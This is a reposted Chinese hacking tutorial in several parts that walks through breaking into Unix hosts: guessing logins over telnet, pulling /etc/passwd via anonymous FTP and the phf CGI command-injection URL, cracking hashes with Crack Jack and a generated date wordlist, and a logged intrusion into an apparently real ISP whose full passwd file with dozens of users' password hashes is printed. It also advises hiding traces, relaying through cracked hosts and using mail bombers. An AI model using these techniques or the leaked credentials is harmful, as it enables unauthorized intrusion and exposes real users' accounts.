如何攻破一个系统

来源:互联网 发布:sql server 2008 x64 编辑:程序博客网 时间:2024/05/16 05:28

如何攻破一个系统(1-5)
1
这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !!

#1 甚麽是 Hacking ?
就是入侵电脑! 有甚麽好解释的! 大部份有关介绍 Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最好不要成为一个 "骇客", 我... 不是!

#2 为甚麽要 Hack ?
我们只是为了要了解更多关於系统的技术, 入侵它, 了解它是如何运作的, 试试它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作 !! 为了安全性而作革命!

#3 Hack 守则
1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.
恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料 !!
2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状.
3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友.
4. 不要在 bbs 上谈论你 Hack 的任何事情.
5. 在 Post 文章的时候不要使用真名.
6. 正在入侵的时候, 不要随意离开你的电脑.
7. 不要侵入或破坏政府机关的主机.
8. 不在电话中谈论你 Hack 的任何事情.
9. 将你的笔记放在安全的地方.
10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞的文件 (英文快点学好)!
11. 已侵入电脑中的帐号不得清除或修改.
12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !!
13. 不将你已破解的帐号分享与你的朋友.

#4 破解之道
1. 进入主机中
2. 得到 /etc/passwd
3. 得到系统帐号
4. 得到最高权限

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 1.
进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)或 FTP 或 WWW  (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些  Port 都是很好的进行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麽??? 我不知道, 你知道吗?!

底下的示范并不是像写出来的那麽容易, 只不过是要让你了解如何进入, 当然其中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了面子.... 一定要删掉这些不堪入目的东西嘛...

示范进入主机的方法: (By CoolFire)

(首先要先连上某一台你已经有帐号的 Telnet 主机, 当然最好是假的, 也就是 Crack过的主机, 然後利用它来 Crack 别的主机, 才不会被别人以逆流法查出你的所在)

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

(我用的是 ms.hinet.net ... 当然是假的罗, 都已经经过修改了啦 !!没有这一台主机啦 !! 别怕 ! 别怕 ! 以下的主机名称都是假的名称,要记得 !!)

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是......)

ms.hinet.net> telnet www.fuckyou.hinet.net (Telnet 试试看....)
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
(没关系, 再来 !!)
cool login: hinet
Password:
Login incorrect

cool login:

(都没猜对, 这边用的是 猜 的方法, 今天运气好像不好)
telnet> close
Connection closed.

(重来, 换个 Port 试试看 !!)

ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.


<HTML>
<HEAD>
<TITLE>Error</TITLE>
</HEAD>
<BODY>
<H1>Error 400</H1>

Invalid request "" (unknown method)

<P><HR><ADDRESS><A HREF="http://www.w3.org">CERN-HTTPD 3.0A</A></ADDRESS>
</BODY>
</HTML>
Connection closed by foreign host.

(哇哩 !! 连密码都没得输入, 真是..... 再来 !! 要有恒心 !!)
(换 FTP Port 试试)

ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@cool.com
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

(哇 ! 可以用 anonymous 进来耶!! password 部份输入 aaa@ 就好了 !
不要留下足迹喔!!)

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.

(嗯嗯... 太好了 ! 进来了 !! 下一个目标是.....)

ftp> cd etc
250 CWD command successful.
ftp> get passwd (抓回来 !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)
(喔... 这麽容易吗??)
ftp> !cat passwd (看看 !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0perator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash

(哇哩... 是 Shadow 的... 真是出师不利.... )

ftp> bye
221 Goodbye.

(不信邪.... 还是老话, 要有恒心....)
(FTP 不行, 再 Telnet 看看 !!)

ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

(又猜错 !!)

cool login: fuckyou
Password:
Last login: Mon Dec 2 09:20:07 from 205.11.122.12
Linux 1.2.13.

Some programming languages manage to absorb change but withstand
progress.

cool:~$

(哇哈哈 !! 哪个笨 root, 用 system name 作 username 连
password 也是 system name.... 总算... 没白玩...)

cool:~$ system
bash: system: command not found

(嗯... 这个 user 的权限好像不大....)

cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/ cdrom/ lib/ mnt/ tmp/ www/
README dev/ linux* proc/ usr/
bin/ etc/ local/ root/ var/
boot/ home/ lost+found/ sbin/
cool:/$ cd etc
telnet> quit
Connection closed.
ms.hinet.net> exit

已经进来了
进入主机 !!
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
How 2.

抓回来一个 "乱七八糟" 的 /etc/passwd, 你以为我的真那麽笨吗?? guest 所抓回来的能是甚麽好东西?? 所以继续上次的攻击行动.我们已经 "猜" 到了一个不是 guest 的 username 及 password.就以它来进入主机瞧瞧!!

Digital UNIX (ms.hinet.net) (ttypa)

login: FakeName
Password:
Last login: Mon Dec 2 03:24:00 from 255.255.0.0

Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯... 进来了 ! 开始攻击吧 ! 本次的目标是.....呵...)

ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 试试看.... 昨天的位址,
有作笔记吧!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

cool login: fuckyou
Password: (一样输入 fuckyou)
Last login: Mon Dec 1 12:44:10 from ms.hinet.net
Linux 1.2.13.

cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS ftpusers localtime resolv.conf
HOSTNAME gateways magic rpc
NETWORKING group mail.rc securetty
NNTP_INEWS_DOMAIN host.conf motd sendmail.cf
X11@ hosts messages/ sendmail.st
XF86Config hosts.allow mtab services
at.deny hosts.deny mtools shells
bootptab hosts.equiv named.boot shutdownp
csh.cshrc hosts.lpd networks snoopy/
csh.login httpd.conf nntpserver slip.hosts
exports inetd.conf passwd snooptab
fastboot inittab passwd.OLD syslog.conf
fdprm issue passwd.old syslog.pid
fstab ld.so.cache printcap ttys
ftpaccess ld.so.conf profile utmp@

(找寻目标..... 太乱了 ! 懒得找, 再来 ....)
cool:/etc$ ls pa*
passwd passwd.OLD passwd.old

(果然在)

cool:/etc$ more passwd
(看看有没有 Shadow...)

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(正点 ! 一点都没有防备 !!)
cool:/etc$ exit
logout
(走了!.... 换 FTP 上场 !!)
Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)

ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(看看 ! 呵 ! 假不了 !!......)
ftp> bye
221 Goodbye.
ms.hinet.net> exit

(闪人罗 !! 喔慢点, 还有事要说明......)

passwd 的 Shadow 就是把 passwd 放在 shadow 档中, 而你原先在第一节课所看到的这个格式的 passwd 并不是真正的 passwd....

root::0:0:root:/root:/bin/bash

因为密码的部份没有东西.... 所以拿了也没有用 !! 但这次所拿到的东西呢,像是这样, 有几点需要说明的, 就是它究竟代表著甚麽???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

它以 ":" 分成几个栏位, 各栏位对照如下:
User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh

保留著你千辛万苦所拿到的 passwd, 咱们再来告诉各位如何使用 Crack Jack 把 passwd 解码....

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


Crack Jack V1.4 中文使用说明 (By CoolFire 12-1-1996)


咱们来说说 Crack Jack ! 这可是个解读 /etc/passwd 的好工具喔,不要告诉我你习惯用Brute, 拿 Brute 跟  Crack Jack 的速度比比看, 包准你马上投向 Crack Jack 1.4的怀抱, 但请先确定你所使用的是  Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page
中拿到这个版本的 Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上 !但还是要讲讲它的缺点... 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上开个 DOS Mode 跑,它可是连理都不会理你的 !

OK! 现在切入正题 ! etc/passwd 拿到手了吧 !! 开始罗 !! 使用 Crack Jack 1.4前所需要的东西有这些 [1]  Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在 Unix
系统中的 /etc/ 目录中找到 passwd [3] 字典档 (哪里找, 自己敲... 呵 ClayMore 中有一份
DIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听James说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用 Crack Jack 1.4
前需先确定你所使用的机器是 386 含以上 CPU 的 ! 然後最好有充足的记忆体 !!

开始 Jack 时只要敲入 JACK 即可, 它会问你 PW Name... 输入你的 passwd 档名,Dictionary
Name 输入你的字典档名, Jack 就会开始找了 ! 找到时会告诉你, 也会在 JACK.POT中写入它所找到的密码 !! 但... 有点怪的格式! 如果找到的是具 root 权限的密码, Jack 会告诉你
This is JackAss... 嗯...说脏话了 !! 因为使用 Jack 占用的时间实在太多,如果你中途想要停掉时只要按下 Ctrl- C 即可, 别以为你前功尽弃了! 因为 Jack 有个 Restore 的功能,中断时会自动存档为 RESTORE, 下次要继续这次的寻找只要输入 Jack -Restore:RESTORE 即可 !!
当然你也可以为你的 Restore 重新命名 ! Jack 也会找得到的 ... 如Renrestorerestore.HNT
之後要再寻找的时後就 Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的 Restore
前次所寻找的字串...继续帮你找下去....

字典档哪里找: 我的不给你! 可以找别的 Brute Force 之类的程式, 有些里面会附,或是找找其它的 Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来,
可能要有一点资料栏位及写程式的基础.

成功的案例: 找到过某家网路咖啡店的 root 权限密码 ! Jack好正点呀 !!!所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧 !!

2
上文 CoolFire 讲到许多的 Net Coffee 店, 安全性之差实在是没话说,但是过了这麽久也不见有几家改进, 可能是想让自己的电脑被别人玩弄在股掌之间吧, 但可不是每个人都像CoolFire这样温和, 如果遇到的是比较狠一点的角色, 那你的 Net Coffee 可能要有一两天只卖Coffee 而没办法再 Net 下去了!!

继 CoolHC#1 推出後, 有许多人是否已经跃跃愈试了呢 ?? 这次咱们不谈新的花招,用用之前所讲的再来探险一番, 当然, 这一次我照往例还是不会使用真正的 Domain Name 来作教学,但是课程中的所有内容绝对属实, 当然本次攻击的对象还是....  Net Coffee Shop....

**谈一下 Crack Jack 猜猜密码

许多人从上一次介绍 Crack Jack 之後就应该已经领教过它的功力了,但是有几点需要说明的,
有些人使用 Jack 来帮你寻找 password, 我就当你已经抓到了没有 shadow 的 /etc/passwd,
但是为甚麽使用 Jack 还是找不到呢?? 我想你应该要换个正点一点的字典档了, 因为Jack 还
是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字,那当然连一个小小帐号
的密码你都别想猜到了. 数一下你所使用的字典档中有多少字 ???我用的字典档有十九万多个
字, 你的呢? 是不是小巫见大巫呀 ?? 那麽就赶快充实一下字典档再重新寻找吧 !!

许多人的密码都有一定的法则, 我自己写了 PaSs2DiC 就是将 UserName 由passwd档转成字典档的工具, 这是对一些喜欢使用  UserName 当作 Password 的人最好的方式,但是也曾经好运的找到别人的密码, 真不晓得"甲"是不是暗恋"乙"才用"乙"的 ID  作为密码的 ???你可以很简单的使用Qbasic 来制作 "序数" 密码, 或日期密码, 底下简单的作一个 0101 (一月一日) 到
1231 的密码
档出来:
------------Cut Here MakeDate.BAS -------------------
Open "Dates" for output as #1
for I=1 to 12
for J=1 to 31
I1$=rtrim$(ltrim$str$(I)))
J1$=rtrim$(ltrim$str$(J)))
if len(I1$)=1 then I1$="0"+I1$
if len(J1$)=1 then J1$="0"+J1$
Out$=I1$+J1$
print #1,Out$
next I
next J
close
------------ Cut Here End MakeDate.BAS ----------------
这支小程式将会写一个 "DATES" 的档案, 里面就是你要的字典, 当然啦,这只是包含月跟日 !!
如果你要猜的密码是含年份的, 你可能要再增加一些程式码, 再 Run 一次试试看了,不过这是一个好的开始不是吗 ??

**如何保护自己的密码

谈了这麽多的密码猜法, 当然要谈一下如何保护自己的密码不被破解,
请遵守以下的原则:

[1]不用生日作为密码(太容易猜了啦) [2]不用序数作为密码(除非你的序数无限大)
[3]不用身份证字号作为密码(LetMeIn! 里有猜身份证字号的功能耶)
[4]不用在字典中查得到的字作为密码.

那麽依照上面的几点说法, 甚麽样子的密码最不容易猜, 自己也最好记呢?? 答案是:用一句有意义的话来作为自己的密码, 例如:  NoOneCanCrackIt 就是一个很难猜的密码类型,基於这个密码猜法的原则, 你的密码是不是要作些更新, 或是大小写要作一些对调 ??  如果你的密码是
coolfire,
建议你最好能改成 CoolFire 或 coolfires (加复数 "s"),
这样被猜中的机率就小了很多. 如果你是一个 Hacker, 你的密码也被人猜中的话... 那...#%%^^^&@

**正式的话题

这次的话题当然还是 Crack, 相信许多人已经看过 CoolHC#1 了,当然眼尖的人可能也已经 D/L
System Holes 试过了, 你有成功的例子吗 ?? 如果没有, 这份 CoolHC#2可能就是你的强心针,
因为这次谈的正是 System Holes #1 成功的案例.Step 1. 连线到 "蕃薯藤" 找 "网路咖啡" 找到好多家网路咖啡的 WWW 网址,一一连上去试试看
在 System Holes #1 中的方法可不可行.
Step 2. 若可行则会传回 /etc/passwd 资讯, 存档後迅速 Logout, 使用 Crack Jack
解读!!

[[实例探讨]]

System Holes #1 中所介绍的 WWW 入侵法是这样子的:
http://www.somewhere.com/cgi-bin/nph-test-cgi?* 後再
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd

[1] 用 WWW Browser 连到 yournet.net
[2] Location 输入 --> "www.yournet.net/cgi-bin/nph-test-cgi?*"
[3] 接著如果出来一份像 Report 的画面的话, 接著输入
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
[4] 发生了甚麽事?? etc/passwd 在你的浏览器中 "显示" 出来了 !! 快点 Save 吧
!!

这个方法所用的是系统 "检索" 的漏洞, 不提供这个功能,或是伺服器检索类型不同的机器则不
会接受这样的指令, 当然也就逃过我们这次的模拟演练啦 !! 但是.... 相信我,你一定会找到一家脱线的网路咖啡, 并没有像我们一样每天阅读  Mail List 的信,对系统安全一点研究也没有的人不在少数. http://hacker.welcome.com 就是这样的一个  Net Coffee Shop...呵.... 快来试试吧 !!

当 CoolFire 抓到 /etc/passwd 後, 立刻存档, 也马上断线, 并且拿出 UltraEdit来瞧一下使用者的资讯, 当然这个小 passwd 对 Crack Jack 来说, 实在是不够看,没几分钟就在我的 486 机器上显示出来几个以 UserName 作为  Password 的资讯 (归功於 PaSs2DiC 及CrackJack 的功劳)不过当我试著找寻 root 的密码时, 一想到我那将近  20 万字的字典档,就想到可能花费的时间一定相当的惊人, 於是就以 Jack 的 Option 设定只寻找 root 那一行, ...(过了良久)... 果不然又是一个笨 root. 用了 "非常" 容易猜的密码... <--- This is JackAss... 呵!!  Got It!

如果你所使用的机器速度不是顶快, 你最好能够到快一点的机器上使用 Crack Jack,不然你也可以将字典档切割成几个小档案, 然後再分别在几台机器上跑, 我目前使用的配备是486DX4-13032MB RAM, 3.2GB HDD, 近 20 万字的字典档, 如果在分析较大的  passwd档时我会将字典档切割为四至五个小档 (看有多少台机器可跑),然後在周末下班前在公司的几台机器上分别执行 Crack Jack, 等到礼拜一上班时就等著接收成果了! 当然如果你只有一台机器, passwd档又很大的话,由於 Crack Jack 无法於 Windoz 95 下使用, 你可能只能牺升时间或机器来跑了!再没有办法的话, 亦可使用单机多工, 多开几个 DOS Box 来跑 Brute, 也许也是一个可行的办法!

**後语

有许多人在使用 Crack Jack 的时候有许多问题, 不过看了 CoolHC#1 应该都解决了吧?? 最近大家问的比较多的是  UpYours 3.0, 虽然已经改进了 Install 的问题,不过大家的问题还是都出在Winsck.ocx 上面, 有人说装了  MSICP Beta 会好 ?? 但也有实例装了也还不能 Run 的,
在此建议大家不要再玩 MailBomb 了, 虽然我喜欢收集这种东西, 但还是少乱炸为妙,已经证实有许多常用的 MailBomb 没有办法  Fake IP 了 !! 所以... 如果 UpYours 3.0装不起来的人就试试 KaBoom!V3.0 吧 ! 虽然没有办法  Fake IP (选错 Mail Server 的话), 但是也是一个不错的AnonyMailer如果要发匿名信, 现在首页上有可以帮你发信的  Mailer, 会安全一点.

如果你仍旧对 UpYours 3.0 不死心, 就试试 ResSvr32.exe (Under Windows/systemrectory),
看看能不能将 WinSck.ocx 装上了... 记得先 UnReg 再 Reg...

在此建议大家可以多订阅一些 "系统安全" 讨论的 Mail List或多参考一些已经被找出来的系统漏洞, 因为有些人对这些方面并不是很重视, 所以这些资讯也就显得格外的重要了,如果能够多参考一些资讯, 在你入侵的时候会有很大的帮助, 当然, 如果你能作出一份列表出来,放在手边参考的话,  就可以快速的; 安全的入侵了!! 下一次所谈的是 SendMail 的 Bug 实例,在这中间当然照往例会先出一份  System Holes #2 来作为资料. 如果有兴趣的人在 SH#2出来的时候可以先研究看看.
------
3
前几节说到了 Net Coffee 店, 还好他们没有提供客户拨接上线的功能,不然密码或是帐号被人盗用的客户不就糗大了! 但是 CoolFire 在这两周的探险中, 为了找一个酷似网路咖啡站台的
W3 密码,误入一个号称第一个提供网路拨接的 ISP, 且在 CoolFire 顺利的抓回 /etc/passwd
之後, 使用了自己写的 PaSs2DiC + CJack 来解出密码, 没想到不用 1 分钟, 就找出了 9 组 ID 与Password 相同的密码,勿怪我没有在这里提醒大家, 还好我没有找到 root password, 不然可能该系统就此停摆,不可再见天日也! (当然我不可能这麽作啦!).

看看最近兴起的网路咖啡及各大网站的系统安全设施, 再加上 CoolFire最近开会的时候遇到的情况, 不难发现我们的国家正往高科技的领域快步迈进, 但是这些系统的安全性若不加强,可能到时候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业崩溃!
大家要小心呀 !
ISP 是一般 User 拨接的源头, 技术上理应比较强, 但还是轻易让人入侵, 且又没有教导User 正确的网路使用观念 (Password 的设定及 proxy 的使用等),实在不敢想像这样的网路发展到几年後会是甚麽样子 ??

这一次的说明还是没有谈到新的技巧, 在 James将首页更新後各位应该已经可以从中学到许多东西了, 如果想要学习入侵, 就一定要知道最新的资讯  (入侵本国的网路则不用,反正没人重视网路安全..... 真失望), 在别人还没将 Bug 修正之前就抢先一步拿到 /etc/passwd,所以订阅一些网路安全的 Mail List 是必要的, 多看一些网安有关的 News Group 也是必要的 (不仅 Hacker如此, ISP 更要多注意这些资讯!). 日後有空再整里一些 Mail List 给大家 !!

本次主题: 说明如何连接该 ISP 并且对其 /etc/passwd 解码连接位址: www.coffee.com.tw  (203.66.169.11)特别说明: 由於本次主题说明重点使用真实的位址及名称, 所以 CoolFire 已经 Mail给该网页之维护人员更改密码, 但该网页之 ISP 仍为新手之练习好题材! CoolFire
Mail 给该网页维护人员之信件内容如下, 如果他还不尽快改掉, 我也没办法了!

Mail sent to dhacme@tp.globalnet.com.tw:
Subject: 请速更动网页密码
From: CoolFire <coolfires@hotmail.com>

你的网页作得不错, 但是因为你所设定的密码太容易为骇客所? 入侵, 请於见到此信後速速更改你的网页进入密码, 否则下次若网页遭到篡改, 本人概不负责!!

**** 课程开始 ****

请注意: 由於本次所作的课程内容以实作为主, 除了本人 IP 有所更改,一切都使用本人所用之
Telnet 软体 Log 档收录, 故若道德感不佳者请勿阅读以下之详细破解内容,否则本人概不负责!

(连线到某一主机之後.... 此处的 ms.hinet.net.tw 是假的 Domain name)
ms.hinet.net.tw> telnet www.coffee.com.tw
Trying 203.66.169.11...
Connected to www.coffee.com.tw.
Escape character is '^]'.
Password: (随便按一下 Enter)
Login incorrect

www login: coffee (以 Hacker 的敏锐判断 username=coffee password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw

欢 迎 光 临 ....... 以下略! 因涉及该 ISP 的名誉, 大家自己去看吧!=================================================================

(直接进入核心部份)
www:~$ cd /etc
www:/etc$ ls
DIR_COLORS hosts.equiv printcap
HOSTNAME hosts.lpd profile
NETWORKING inet@ protocols
NNTP_INEWS_DOMAIN inetd.conf psdevtab
X11@ inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
csh.cshrc issue securetty
csh.login issue.net securetty.old
default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
fastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
fstab magic slip.hosts
ftp.banner mail.rc slip.login
ftp.deny motd snooptab
ftpaccess motd.bak sudoers
ftpconversions msgs/ syslog.conf
ftpgroups mtab syslog.pid
ftpusers mtools termcap
gateways named.boot ttys
gettydefs networks utmp@
group nntpserver vga/
host.conf passwd wtmp@
hosts passwd.OLD yp.conf.example
hosts.allow passwd.old
hosts.deny ppp/

(看看我们的目标长得如何???)
www:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0perator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100erfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100rime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lancef7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwuai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
lillyhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
